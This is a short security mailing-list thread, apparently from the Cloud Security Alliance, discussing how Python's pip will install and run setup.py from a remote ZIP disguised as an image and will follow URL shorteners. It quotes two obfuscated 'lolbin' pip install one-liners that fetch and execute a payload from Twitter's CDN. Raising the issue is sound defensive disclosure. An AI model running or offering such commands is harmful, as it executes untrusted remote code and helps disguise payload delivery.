I don't think these are vulnerabilities per se, but they are definitely sharp edges that clearly most people don't know about. One thought: if there's an "informational" entry, e.g. "python pip will install software, as expected, but can also do so directly from arbitrary URL's"
------------------------------
Kurt Seifried
Chief Blockchain Officer and Director of Special Projects
Cloud Security Alliance
[email protected]------------------------------
Original Message:
Sent: Oct 27, 2022 11:00:18 AM
From: Kurt Seifried
Subject: Security Glitch: Python pip problems
https://twitter.com/david3141593/status/1584462389977939968?s=43&t=CEmtkaMrle2hJwbdOXjMzw
TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"
https://twitter.com/David3141593/status/1584505603799408640
It also follows redirects, so you can use a URL shortener too!
pip install https://t"."co/uPXauf8eTg
------------------------------
Kurt Seifried
Chief Blockchain Officer and Director of Special Projects
Cloud Security Alliance
[email protected]
------------------------------